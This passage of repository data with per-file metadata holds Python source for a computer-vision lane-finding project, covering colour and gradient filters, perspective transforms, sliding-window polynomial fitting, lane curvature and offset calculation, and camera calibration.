cv2.CV_64F, 1, 0, ksize=kernel_size)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=kernel_size)\n \n # Calculate the magnitude of the derivative\n sobel_magnitude = np.sqrt(np.square(sobelx) + np.square(sobely))\n \n # Normalize magnitude to 8-bit value\n sobel_magnitude_norm = np.uint8(255 * sobel_magnitude/np.max(sobel_magnitude))\n \n # Create binary mask of values within mag_threshold\n sobel_bin = np.zeros_like(sobel_magnitude_norm)\n sobel_bin[(sobel_magnitude_norm >= mag_thresh[0]) & (sobel_magnitude_norm <= mag_thresh[1])] = 1\n \n # Return the mask\n return sobel_bin\n\n\n# Implement directional filtering\ndef dir_threshold(image, kernel_size=3, thresh=(0, np.pi/2)):\n img = np.copy(image)\n \n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # Calculate the derivative in x and y-directions\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=kernel_size)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=kernel_size)\n \n # Calculate the absolute value of each derivative\n sobelx_abs = np.absolute(sobelx)\n sobely_abs = np.absolute(sobely)\n \n # Calculate the direction of the gradient\n direction = np.arctan2(sobely_abs, sobelx_abs)\n \n binary_output = np.zeros_like(gray)\n binary_output[(direction >= thresh[0])&(direction <= thresh[1])] = 1\n \n return binary_output\n\n\ndef select_lines_in_hls(image):\n img = np.copy(image)\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n \n # Mask for yellow lines\n lower_thresh = np.uint8([10, 0, 100])\n upper_thresh = np.uint8([40, 255, 255])\n yellow_line_mask = cv2.inRange(hls, lower_thresh, upper_thresh)\n \n # Mask for white lines\n lower_thresh = np.uint8([0,180,0])\n upper_thresh = np.uint8([255,255,255])\n white_line_mask = cv2.inRange(hls, lower_thresh, upper_thresh)\n \n # Combine color masks\n cmb_mask = cv2.bitwise_or(yellow_line_mask, white_line_mask)\n return cv2.bitwise_and(img, img, mask = cmb_mask)\n\n\ndef select_lines_in_colorspaces(image):\n img = np.copy(image)\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n lab = cv2.cvtColor(img, cv2.COLOR_RGB2Luv)\n luv = cv2.cvtColor(img, cv2.COLOR_RGB2Lab)\n \n s = hls[:,:,2]\n s_lower_thresh = 180\n s_upper_thresh = 255\n s_binary = np.zeros_like(s)\n s_binary[(s >= s_lower_thresh) & (s <= s_upper_thresh)] = 1\n \n b = lab[:,:,2]\n b_lower_thresh = 160\n b_upper_thresh = 200\n b_binary = 
np.zeros_like(b)\n b_binary[(b >= b_lower_thresh) & (b <= b_upper_thresh)] = 1\n \n l = luv[:,:,0]\n l_lower_thresh = 210\n l_upper_thresh = 255\n l_binary = np.zeros_like(l)\n l_binary[(l >= l_lower_thresh) & (l <= l_upper_thresh)] = 1\n \n binary_comb = np.zeros_like(s)\n binary_comb[(l_binary == 1) | (b_binary == 1)] = 1\n \n return binary_comb\n\n\n# Implement HLS (s-channel) filtering\ndef apply_saturation_mask(image):\n img = np.copy(image)\n \n s = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)[:,:,2]\n \n thresh = (100, 255)\n binary_output = np.zeros_like(s)\n binary_output[(s >= thresh[0]) & (s <= thresh[1])] = 1\n\n return binary_output\n\n\n# Combine color and gradient filtering\ndef apply_saturation_and_gradient_masks(image):\n img = np.copy(image)\n \n kernel_size = 3\n s = apply_saturation_mask(image)\n dx = abs_sobel_thresh(img, 'x', kernel_size, (20, 100))\n dy = abs_sobel_thresh(img, 'y', kernel_size, (20, 100))\n mag = mag_thresh(img, kernel_size, (30, 100))\n direction = dir_threshold(img, kernel_size, (0.7, 1.3))\n comb = np.zeros_like(direction) \n #comb[((dx == 1) & (dy == 1)) | ((mag == 1) & (direction == 1)) | (s == 1)] = 1\n comb[((dx == 1) & (dy == 1)) | (s == 1)] = 1\n \n return comb\n\n\n# Tunable Filter Hyperparameters\ndef apply_saturation_mask2(image_id, kernel_size, thresh_low, thresh_high):\n img = np.copy(helpers.test_images_undst[image_id])\n warp, m, mInv = helpers.get_lane_perspective(img)\n hls_img = select_lines_in_hls(warp)\n \n blur = cv2.GaussianBlur(hls_img, (kernel_size, kernel_size), 0)\n \n s = cv2.cvtColor(blur, cv2.COLOR_RGB2HLS)[:,:,2]\n \n thresh = (thresh_low, thresh_high)\n binary_output = np.zeros_like(s)\n binary_output[(s >= thresh[0]) & (s <= thresh[1])] = 1\n\n plt.imshow(binary_output, cmap='gray')\n\n\ndef apply_sat_and_grad_masks(img_id, ksize, dxl, dxh, dyl, dyh, magl, magh, dirl, dirh):\n img = np.copy(helpers.test_images_undst[img_id])\n warp, m, mInv = helpers.get_lane_perspective(img)\n \n kernel_size = ksize\n s = apply_saturation_mask(warp)\n dx = abs_sobel_thresh(warp, 'x', kernel_size, (dxl, dxh))#20,100\n dy = abs_sobel_thresh(warp, 'y', kernel_size, (dyl, dyh)) #20,100\n mag = mag_thresh(warp, kernel_size, (magl, magh)) #30,100\n print(dirl, dirh)\n direction = dir_threshold(img, kernel_size, (dirl, dirh)) #0.7, 1.3\n comb = np.zeros_like(direction) \n comb[((dx == 1) & (dy == 1)) | ((mag == 1) & (direction == 1)) | (s == 1)] = 1\n plt.imshow(comb)\n\n\ndef apply_colorspace_masks(img_id, satl, sath, bl, bh, ll, lh):\n img = np.copy(helpers.test_images_undst[img_id])\n warp, m, mInv = helpers.get_lane_perspective(img)\n\n hls = cv2.cvtColor(warp, cv2.COLOR_RGB2HLS)\n lab = cv2.cvtColor(warp, cv2.COLOR_RGB2Luv)\n luv = cv2.cvtColor(warp, cv2.COLOR_RGB2Lab)\n \n s = hls[:,:,2]\n s_binary = np.zeros_like(s)\n s_binary[(s >= satl) & (s <= sath)] = 1\n \n b = lab[:,:,2]\n b_binary = np.zeros_like(b)\n b_binary[(b >= bl) & (b <= bh)] = 1\n \n l = luv[:,:,0]\n l_binary = np.zeros_like(l)\n l_binary[(l >= ll) & (l <= lh)] = 1\n \n binary_comb = np.zeros_like(s)\n binary_comb[((l_binary == 1) | (b_binary == 1)) & (s_binary == 1)] = 1\n \n plt.imshow(binary_comb, cmap='gray')"
},
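Every filter in `filters.py` above repeats the same masking idiom: build a zero array the shape of the channel, then set 1 wherever the channel value falls inside the threshold pair. Isolated on a toy array:

```python
import numpy as np

channel = np.array([[50, 120],
                    [200, 90]], dtype=np.uint8)  # toy single-channel image
low, high = 100, 255

binary = np.zeros_like(channel)
binary[(channel >= low) & (channel <= high)] = 1
print(binary)
# [[0 1]
#  [1 0]]
```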
{
"alpha_fraction": 0.6320633888244629,
"alphanum_fraction": 0.6543083786964417,
"avg_line_length": 41.2864875793457,
"blob_id": "e43c6b17c2c37ebc60061f0dd9014d609ee49de1",
"content_id": "43b4ad33fef8358197f3ad0dd770c521e5aa6c8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7822,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 185,
"path": "/lane_finding.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport helpers\nimport line\nimport filters\n\n# Use the interact widget to help with parameter tuning\nfrom IPython.html.widgets import *\n\ndef find_lane(camera, image): \n img = np.copy(image)\n \n #Undistort image\n undist_img = camera.undistort(img)\n \n # Apply various filters to obtain lane lines from image\n masked_img = filters.select_lines_in_colorspaces(undist_img)\n \n # Get lane perspective\n warped_image, M, Minv = helpers.get_lane_perspective(masked_img)\n \n if left_lane_line.detected and right_lane_line.detected:\n # Use the search around poly function here\n leftx, lefty, rightx, righty = helpers.search_around_poly2(warped_image, left_lane_line.get_last_fit(), right_lane_line.get_last_fit())\n else: \n # Get lane line pixels via sliding window search\n leftx, lefty, rightx, righty, out_img = helpers.find_lane_pixels(warped_image)\n\n if len(leftx) > 0 and len(lefty) > 0 and len(rightx) > 0 and len(righty) > 0: \n # Fit polynomial lines to lanes\n left_fit, left_fitx, right_fit, right_fitx, ploty = helpers.fit_poly(warped_image.shape, leftx, lefty, rightx, righty)\n\n # Get curve radius and lane offset from lane lines\n left_curve_rad, right_curve_rad, lane_center_offset = measure_curvature_pixels_and_lane_offset(warped_image.shape, ploty, left_fitx, right_fitx, left_fit, right_fit)\n\n\n # Add current fit to Line class for each lane line\n left_lane_line.add_current_fit(left_fit, left_fitx, lane_center_offset, left_curve_rad)\n right_lane_line.add_current_fit(right_fit, right_fitx, lane_center_offset, right_curve_rad)\n \n # Calculate average curve radius for the two lane lines\n curve_rad_avg = np.mean([left_lane_line.get_curve_radius(), right_lane_line.get_curve_radius()])\n \n # Get vehicle center offset from lane center\n lane_center_offset = left_lane_line.line_base_pos\n \n # Draw the best_fit (averaged) lane lines onto the image\n weighted_img = draw_lane(undist_img, warped_image, left_lane_line.get_best_fit(), right_lane_line.get_best_fit(), Minv)\n\n # Return the image with the radius of curvature and vehicle location information displayed\n return draw_curve_radius_info(weighted_img, curve_rad_avg, lane_center_offset)\n\n\n# Calculate lane offset, then draw lane\ndef measure_curvature_pixels(ploty, leftx, rightx):\n '''\n Calculates the curvature of given polynomial functions in meters\n '''\n ym_per_pix = 30/720 # Meters per pixel in y-dimension\n xm_per_pix = 3.7/700 # Meters per pixel in x-dimension\n \n # Define the y-value at which the radius of curvature should be calculated. 
This will be the bottom of the image.\n y_eval = np.max(ploty)\n \n # Calculate the radius of curvature for each lane line\n left_curve_rad = None\n right_curve_rad = None\n \n # Fit a second order polynomial to pixel positions in each fake lane line\n left_fit_m = np.polyfit(ploty*ym_per_pix, leftx*xm_per_pix, 2)\n right_fit_m = np.polyfit(ploty*ym_per_pix, rightx*xm_per_pix, 2)\n \n if left_fit_m is not None:\n left_curve_rad = (((1 + (2*left_fit_m[0]*y_eval*ym_per_pix + left_fit_m[1])**2)**(3/2))/np.abs(2*left_fit_m[0]))\n \n if right_fit_m is not None:\n right_curve_rad = (((1 + (2*right_fit_m[0]*y_eval*ym_per_pix + right_fit_m[1])**2)**(3/2))/np.abs(2*right_fit_m[0]))\n \n return left_curve_rad, right_curve_rad\n\n\ndef measure_curvature_pixels_and_lane_offset(img_shape, ploty, leftx, rightx, lf, rf):\n '''\n Calculates the curvature of given polynomial functions in meters and calculates\n the distance between the centerline of the vehicle and the center of the lane.\n This assumes that the camera center is coincident with the centerline of the vehicle.\n '''\n height, width = img_shape[:2]\n y_eval = height\n left_location = (lf[0]*y_eval**2 + lf[1]*y_eval + lf[2])\n right_location = (rf[0]*y_eval**2 + rf[1]*y_eval + rf[2])\n \n ym_per_pix = 30/720 # Meters per pixel in y-dimension\n xm_per_pix = 3.7/(right_location-left_location) # Meters per pixel in x-dimension\n \n # Calculate lane center offset from image center\n lane_center_location = (left_location + right_location) / 2\n lane_offset = lane_center_location - width / 2 \n lane_offset_m = lane_offset * xm_per_pix # Lane offset in meters\n \n # Calculate the radius of curvature for each lane line\n left_curve_rad = None\n right_curve_rad = None\n \n # Fit a second order polynomial to pixel positions in each fake lane line\n left_fit_m = np.polyfit(ploty*ym_per_pix, leftx*xm_per_pix, 2)\n right_fit_m = np.polyfit(ploty*ym_per_pix, rightx*xm_per_pix, 2)\n \n if left_fit_m is not None:\n left_curve_rad = (((1 + (2*left_fit_m[0]*y_eval*ym_per_pix + left_fit_m[1])**2)**(3/2))/np.abs(2*left_fit_m[0]))\n \n if right_fit_m is not None:\n right_curve_rad = (((1 + (2*right_fit_m[0]*y_eval*ym_per_pix + right_fit_m[1])**2)**(3/2))/np.abs(2*right_fit_m[0]))\n \n return left_curve_rad, right_curve_rad, lane_offset_m\n\n\ndef draw_lane(prev_image, warped_image, left_fit, right_fit, minv):\n img = np.copy(prev_image)\n \n if left_fit is None or right_fit is None:\n return img\n \n # Create an image to draw lane lines on\n warped_zero = np.zeros_like(warped_image).astype(np.uint8)\n color_warp = np.dstack((warped_zero, warped_zero, warped_zero))\n \n height, width = warped_image.shape[:2]\n ploty = np.linspace(0, height-1, height)\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2] \n \n left_px = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n right_px = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pix = np.hstack((left_px, right_px))\n \n # Draw the lane back onto the warped image\n cv2.fillPoly(color_warp, np.int_([pix]), (0,255,0))\n cv2.polylines(color_warp, np.int32([left_px]), isClosed=False, color=(255,0,0), thickness=40)\n cv2.polylines(color_warp, np.int32([right_px]), isClosed=False, color=(0,0,255), thickness=40)\n \n # Unwarp the warped image\n unwarped_img = cv2.warpPerspective(color_warp, minv, (width, height))\n \n # Overlay the drawn lane onto the original image\n return cv2.addWeighted(img, 1, 
unwarped_img, 0.5, 0)\n\n\ndef draw_curve_radius_info(image, curve_rad, lane_center_dist):\n img = np.copy(image)\n height = img.shape[0] \n font = cv2.FONT_HERSHEY_TRIPLEX\n \n radius_text = 'Radius of curvature: '\n # Generate radius of curvature text\n if curve_rad < 1000: \n radius_text += '{:-4.2f}'.format(curve_rad) + 'm'\n else:\n radius_text += '{:-4.2f}'.format(curve_rad/1000) + 'km'\n \n # Generate lane center location text\n dist_from_center = '{:-4.3f}'.format(abs(lane_center_dist)) + 'm '\n loc_from_center = ''\n if lane_center_dist < 0:\n loc_from_center = dist_from_center + 'right of center'\n elif lane_center_dist > 0:\n loc_from_center = dist_from_center + 'left of center'\n else:\n loc_from_center = 'On center'\n \n location_text = 'Vehicle location: ' + loc_from_center\n \n # Add text to image \n cv2.putText(img, radius_text, (50, 50), font, 1.5, (200, 255, 200), 2, cv2.LINE_AA)\n cv2.putText(img, location_text, (50, 100), font, 1.5, (200, 255, 200), 2, cv2.LINE_AA)\n return img\n\n\nleft_lane_line = line.Line()\nright_lane_line = line.Line()\n#lane_img = find_lane(test_images_undst[3])\n#plt.imshow(lane_img)\n#plt.imsave(\"output_images/misc_images/lane_location_info.jpg\", lane_img)"
},
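The radius-of-curvature expression used in both `measure_curvature_*` functions above is R = (1 + (2Ay + B)^2)^(3/2) / |2A| for a second-order fit x = Ay^2 + By + C. A standalone numeric sketch with made-up coefficients:

```python
import numpy as np

A, B = 1e-4, 0.01  # hypothetical fit coefficients, already in meters
y_eval = 30.0      # evaluate at the bottom of the image (30 m ahead)

radius = (1 + (2 * A * y_eval + B) ** 2) ** 1.5 / np.abs(2 * A)
print(round(radius, 1))  # ~5001.9 m, i.e. a very gentle curve
```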
{
"alpha_fraction": 0.5322507619857788,
"alphanum_fraction": 0.5403698682785034,
"avg_line_length": 35.05691146850586,
"blob_id": "ec76577f95cec295fd5f3f88c5da1f909a7b6577",
"content_id": "38ea8d55e3e43bb24f50c545b3d4a0d002558115",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4434,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 123,
"path": "/line.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "# Class to store information about lane line instances\nimport numpy as np\n\nclass Line():\n def __init__(self):\n # Set a boolean value to true of a line was detected in the last iteration\n self.detected = False\n \n # Create an array to store the last nFits of lane lines for averaging\n self.nFits = 5\n self.recent_fits = []\n self.recent_x_values = [] \n \n # Average polynomial coefficients over the last nFits iterations\n # This will return three elements [y**2, y, b]\n self.best_fit = None\n \n # Average the x values over the the last nFits iterations\n # This will return an average across each array for the corresponding y-value\n self.bestx = None\n \n # Polynomial coefficients for current fit\n self.current_fit = [np.array([False])]\n \n # Curvature of the turn radius in meters\n self.radius_of_curvature = 0\n \n # Distance in meters of vehicle center from the lane line\n self.line_base_pos = 0\n \n # Store the difference between fit coefficients between the current and last fit\n # This will be used to threshold bad lines\n self.diffs = np.array([0,0,0], dtype='float')\n \n # x-values for detected line pixels\n self.allx = None\n \n # y-values for detected line pixels\n self.ally = None\n \n def add_current_fit(self, fit, xvals, lane_offset, roc):\n if fit is not None:\n if self.best_fit is not None:\n if self.__validate_current_fit(fit):\n self.__insert_fit(fit, xvals, lane_offset, roc)\n if len(self.recent_fits) > self.nFits:\n self.__drop_oldest_fit()\n else:\n # This is a bad fit as the thresholds have been exceeded, do not keep\n self.detected = False \n else:\n # The best fit has not been established. Update with this fit.\n if len(self.recent_fits) > 0:\n self.drop_oldest_fit()\n \n if len(self.recent_fits) == 0:\n # Take this as the first fit\n self.__insert_fit(fit, xvals, lane_offset, roc)\n else:\n self.detected = False\n\n \n def __calculate_best_fit(self):\n if len(self.recent_fits) > 0:\n self.best_fit = np.average(self.recent_fits, axis=0)\n self.bestx = np.average(self.recent_x_values, axis=0)\n else:\n self.best_fit = None\n self.bestx = None\n \n def __drop_oldest_fit(self):\n if len(self.recent_fits) > 0:\n self.recent_fits = self.recent_fits[1:]\n self.recent_x_values = self.recent_x_values[1:]\n \n # Recalculate best fit with fewer fits\n if len(self.recent_fits) > 0:\n self.__calculate_best_fit()\n \n def __insert_fit(self, fit, xvals, lane_offset, roc):\n self.detected = True\n self.line_base_pos = lane_offset\n self.radius_of_curvature = roc\n self.recent_x_values.append(xvals)\n self.recent_fits.append(fit)\n self.__calculate_best_fit()\n \n def __validate_current_fit(self, new_fit):\n # Thresholds must be set high enough that the vehicle can turn\n self.diffs = np.abs(new_fit - self.best_fit)\n if self.diffs[0] > 0.01 or self.diffs[1] > 1.0 or self.diffs[2] > 100.0:\n return False\n return True \n \n def get_best_fit(self):\n self.__calculate_best_fit()\n return self.best_fit\n \n def get_last_fit(self):\n if len(self.recent_fits) > 0:\n return self.recent_fits[-1]\n else:\n return None\n \n def get_curve_radius(self):\n return self.radius_of_curvature\n \n def reset(self):\n '''\n Clear all instance variables\n '''\n self.detected = False\n self.nFits = 5\n self.recent_fits = []\n self.recent_x_values = [] \n self.best_fit = None\n self.bestx = None\n self.current_fit = [np.array([False])]\n self.radius_of_curvature = 0\n self.line_base_pos = 0\n self.diffs = np.array([0,0,0], dtype='float')\n self.allx = None\n self.ally = None"
},
{
"alpha_fraction": 0.6123833656311035,
"alphanum_fraction": 0.6217133402824402,
"avg_line_length": 31.76388931274414,
"blob_id": "e3010473a25edc796cd64dd92353d6298cbda1bc",
"content_id": "551249f11bf5c960159f4e911607a079e1f76bc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2358,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 72,
"path": "/camera.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "'''\nCreate an instance of a Camera that will store calibration matrix\ninformation. Export it out to a pickle file, which can then be\nreimported later when selecting a camera for use with the main\npipeline.\n'''\n\nimport cv2, os, glob\nimport numpy as np\nimport matplotlib.image as mpimg\n\nclass Camera():\n def __init__(self):\n self.obj_points = []\n self.img_points = []\n self.mtx = None\n self.dist = None\n self.ret = None\n self.rvecs = None\n self.tvecs = None\n\n self.nx = 9\n self.ny = 6\n #self.objp = None\n\n \n def calibrate(self, image_dir):\n '''\n Take an image, calibrate the camera, and then return the \n undistorted version of the provided image.\n Store the obj_points and img_points to the member variables.\n '''\n image_files = glob.glob(image_dir)\n self.generate_calibration_points(image_files)\n\n calibration_image = mpimg.imread(image_files[0])\n self.ret, self.mtx, self.dist, self.rvecs, self.tvecs = cv2.calibrateCamera(self.obj_points, self.img_points, calibration_image.shape[1:3], None, None)\n \n\n def undistort(self, image):\n '''\n Undistort an image from provided image and camera calibration\n values, then return it.\n '''\n return cv2.undistort(image, self.mtx, self.dist, None, self.mtx)\n\n \n # TODO: Add Chessboard Corners detection function to implement calibration matrix\n def findChessboardCorners(self, image):\n return cv2.findChessboardCorners(image, (self.nx, self.ny), None)\n\n \n def drawChessboardCorners(self, image, corners, ret):\n return cv2.drawChessboardCorners(image, (self.nx, self.ny), corners, ret)\n\n \n def generate_calibration_points(self, image_files):\n objp = np.zeros((self.ny*self.nx,3), np.float32)\n objp[:,:2] = np.mgrid[0:self.nx, 0:self.ny].T.reshape(-1,2)\n \n for fn in image_files:\n image = np.copy(mpimg.imread(fn))\n\n # Convert image to grayscale\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n # Find chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (self.nx, self.ny), None)\n\n if ret == True:\n self.img_points.append(corners)\n self.obj_points.append(objp)"
},
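A minimal usage sketch of the `Camera` class above, assuming the module is importable as `camera` and reusing the calibration-image glob from `camera_cal.py`; the test-image path is a placeholder:

```python
import matplotlib.image as mpimg
from camera import Camera

cam = Camera()
cam.calibrate('images/camera_cal/calibration*')       # learn mtx/dist from the chessboards

frame = mpimg.imread('images/test_images/test1.jpg')  # placeholder input frame
undistorted = cam.undistort(frame)
```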
{
"alpha_fraction": 0.6217847466468811,
"alphanum_fraction": 0.6454293727874756,
"avg_line_length": 39.274898529052734,
"blob_id": "9da684d59f09f323bf1e4ee17f41296da6b0e08b",
"content_id": "f0e2b7e5e99058adc07ab29d35d622ce80d5942f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10108,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 251,
"path": "/helpers.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "# Helper Functions\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n# Draw ROI on image to determine points to choose, then warp utilizing those lines.\ndef draw_ROI_lines(image):\n img = np.copy(image)\n (height, width) = img.shape [:2]\n vertices = [(120, height), (580, 450), (width-590, 450), (width-120, height)]\n\n cv2.line(img, vertices[0], vertices[1],(255,0,0), 5)\n cv2.line(img, vertices[1], vertices[2],(255,0,0), 5)\n cv2.line(img, vertices[2], vertices[3],(255,0,0), 5)\n \n plt.imshow(img)\n\n\n# Warp image - Perform Perspective Transform\ndef get_lane_perspective(image):\n img = np.copy(image)\n (height, width) = img.shape[:2]\n\n # Specify source points to transform\n top_left_corner = (588, 450)\n top_right_corner = (width-588, 450)\n bottom_right_corner = (width-120, height)\n bottom_left_corner = (120, height)\n src = np.float32([top_left_corner, top_right_corner, bottom_right_corner, bottom_left_corner])\n \n # Specify destination points to transform to\n dst_offset = width * 0.2\n dst = np.float32([[dst_offset,0], [width-dst_offset,0], [width-dst_offset, height], [dst_offset,height]])\n \n # Generate transformation matrices\n M = cv2.getPerspectiveTransform(src, dst)\n Minv = cv2.getPerspectiveTransform(dst, src)\n \n # Warp image to return\n warped = cv2.warpPerspective(img, M, (width, height), flags = cv2.INTER_LINEAR)\n\n return warped, M, Minv\n\n\n# Detect lane lines and fit polynomials\ndef hist(img):\n height, width = img.shape\n histogram = np.sum(img[height*2//3:, :], axis=0)\n return histogram\n\n\ndef find_lane_pixels(warped_image):\n # Get histogram to determine starting position of each lane line\n histogram = hist(warped_image)\n \n # Create an output image for drawing and visualization\n out_img = np.dstack((warped_image, warped_image, warped_image))*255\n\n # Split the image vertically into left and right halves\n midpoint = np.int(histogram.shape[0]//2)\n \n # Find the location of each lane line from the bottom of the image\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:])+midpoint\n\n # Set up sliding windows and hyperparameters\n nWindows = 10\n margin = 75\n min_pix = 50\n\n # Establish window height\n window_height = np.int(warped_image.shape[0]//nWindows)\n\n # Determine the x and y-positions of all pixels in the image\n nonzero = warped_image.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n\n # Set current position\n leftx_current = leftx_base\n rightx_current = rightx_base\n\n # Create lists for left and right lane indices\n left_lane_inds = []\n right_lane_inds = []\n\n # Fit a polynomial to the lane lines\n # Step through the windows\n for window in range(nWindows):\n # Identify the horizontal boundaries for the windows\n win_y_low = warped_image.shape[0] - (window + 1) * window_height\n win_y_high = warped_image.shape[0] - window * window_height\n win_x_left_low = leftx_current - margin\n win_x_left_high = leftx_current + margin\n win_x_right_low = rightx_current - margin\n win_x_right_high = rightx_current + margin\n\n # Draw the rectangular windows on the image\n cv2.rectangle(out_img, (win_x_left_low, win_y_low), (win_x_left_high, win_y_high), (0,255,0), 2)\n cv2.rectangle(out_img, (win_x_right_low, win_y_low), (win_x_right_high, win_y_high), (0,255,0), 2)\n\n # Identify the nonzero pixels inside of the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_x_left_low) & (nonzerox < 
win_x_left_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_x_right_low) & (nonzerox < win_x_right_high)).nonzero()[0]\n\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n\n # If the quantity of pixels found is greater than min_pix, re-center the next window\n # based upon their mean position.\n if len(good_left_inds) > min_pix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n\n if len(good_right_inds) > min_pix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n\n # Concatenate the arrays of lane line indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right positions of the pixels in the lane lines\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n return leftx, lefty, rightx, righty, out_img\n\n\ndef fit_polynomial(warped_image):\n # Get lane pixels\n leftx, lefty, rightx, righty, out_img = find_lane_pixels(warped_image)\n plt.imshow(out_img)\n \n # Fit a second order polynomial to each lane line\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n \n # Generate coordinates for plotting\n ploty = np.linspace(0, warped_image.shape[0]-1, warped_image.shape[0])\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n \n # Generate output image\n out_img[lefty, leftx] = [255, 0, 0]\n out_img[righty, rightx] = [0, 0, 255]\n \n plt.plot(left_fitx, ploty, color='yellow', lw=3)\n plt.plot(right_fitx, ploty, color='yellow', lw=3)\n \n return out_img, left_fit, right_fit, ploty\n\n\ndef fit_poly(img_shape, leftx, lefty, rightx, righty):\n \n ploty = np.linspace(0, img_shape[0]-1, img_shape[0])\n left_fit = None\n right_fit = None\n left_fitx = None\n right_fitx = None \n \n # Fit a second order polynomial to each lane line and generate coordinates for plotting\n if len(leftx) > 0 and len(lefty) > 0:\n left_fit = np.polyfit(lefty, leftx, 2)\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n \n if len(rightx) > 0 and len(righty) > 0:\n right_fit = np.polyfit(righty, rightx, 2)\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n \n return left_fit, left_fitx, right_fit, right_fitx, ploty\n\n\ndef search_around_poly(warped_image):\n margin = 100\n \n # Determine the x and y-positions of all pixels in the image\n nonzero = warped_image.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n \n leftx, lefty, rightx, righty, out_img = find_lane_pixels(warped_image)\n \n # Fit new polynomials to the lane lines\n left_fit, left_fitx, right_fit, right_fitx, ploty = fit_poly(warped_image.shape, leftx, lefty, rightx, righty)\n \n # Determine the search area based upon the margin\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] - margin)) &\n (nonzerox < (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] + margin)))\n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] - margin)) &\n (nonzerox < (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] + margin)))\n \n # Create visualization\n out_img = np.dstack((warped_image, warped_image, warped_image))*255\n window_img = 
np.zeros_like(out_img)\n \n # Add color to lane line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255,0,0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0,0,255]\n \n # Generate a polygon to identify the search window area\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n \n # Draw the lane lines onto the image\n cv2.fillPoly(window_img, np.int_([left_line_pts]),(0,255,0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]),(0,255,0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n \n # Plot the polynomial lines\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n \n return result\n\n\ndef search_around_poly2(warped_image, prev_left_fit, prev_right_fit):\n '''\n This function can be used to look around the previously found polynomial within\n the specified margin parameter to determine if another lane line can be found.\n \n This can help speed up the lane finding processing time for videos.\n '''\n margin = 100\n \n # Determine the x and y-positions of all pixels in the image\n nonzero = warped_image.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n \n # Determine the search area based upon the margin\n left_lane_inds = ((nonzerox > (prev_left_fit[0]*(nonzeroy**2) + prev_left_fit[1]*nonzeroy + 